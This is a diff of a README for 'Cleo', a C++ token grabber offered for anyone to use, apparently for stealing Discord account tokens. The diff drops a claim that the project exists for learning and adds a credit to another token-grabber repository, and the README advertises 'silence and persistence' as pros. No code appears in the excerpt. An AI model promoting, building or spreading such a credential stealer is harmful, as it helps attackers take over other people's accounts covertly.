Passive/Cleo/README.md

 </p>

-A C++ token grabber that anyone can use, please do not "paste" or steal this code because you will regret it.
-The whole point of this is learning.
-If I didn't want to learn I could easily just grab a Python token grabber and use py2exe on it.
+A C++ token grabber that anyone can use, credit to [NightFallGT](https://github.com/NightfallGT/Discord-Token-Grabber/blob/master/Token-Disc/Token-Disc.cpp) and his token grabber, I used his "findMatch" function in order to fix a couple issues I was having.

 ## Pros
      - Silence and persistence